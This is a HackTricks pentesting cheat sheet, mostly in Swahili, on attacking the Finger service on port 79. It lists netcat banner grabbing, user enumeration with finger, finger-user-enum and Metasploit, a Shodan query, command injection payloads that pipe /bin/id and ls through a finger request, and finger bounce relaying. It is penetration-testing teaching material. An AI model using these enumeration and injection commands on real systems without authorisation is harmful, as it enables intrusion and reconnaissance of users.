hacktricks/network-services-pentesting/pentesting-finger.md

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Mpangilio wa haraka wa tathmini ya udhaifu & upimaji wa penya. Fanya upimaji kamili wa pentest kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye recon hadi ripoti. Hatubadilishi wapimaji wa pentest - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Taarifa za Msingi

Programu/huduma ya Finger inatumika kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, taarifa zinazotolewa zinajumuisha jina la kuingia la mtumiaji, jina kamili, na, katika baadhi ya matukio, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alingia, kipindi cha kutokuwa na shughuli (wakati wa kupumzika), tukio la mwisho barua pepe iliposomwa na mtumiaji, na maudhui ya mipango na faili za mradi za mtumiaji.

Bandari ya kawaida: 79

PORT   STATE SERVICE
79/tcp open  finger

Uhesabu

Kuchukua Bango/Kuunganisha Msingi

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Uainishaji wa watumiaji

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Vinginevyo unaweza kutumia finger-user-enum kutoka pentestmonkey, mifano kadhaa:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap tekeleza script kwa kutumia scripts za default

Metasploit inatumia hila zaidi kuliko Nmap

use auxiliary/scanner/finger/finger_users

Shodan

• port:79 USER

Utekelezaji wa amri

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Tumia mfumo kama relay ya finger

finger user@host@victim
finger @internal@external

Mpangilio wa haraka wa tathmini ya udhaifu & upimaji wa penya. Fanya upimaji kamili kutoka mahali popote na zana 20+ & vipengele vinavyotoka kwenye utafiti hadi ripoti. Hatubadilishi wapimaji wa penya - tunatengeneza zana maalum, moduli za kugundua & kutumia ili kuwapa muda wa kuchimba zaidi, kufungua shells, na kufurahia.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}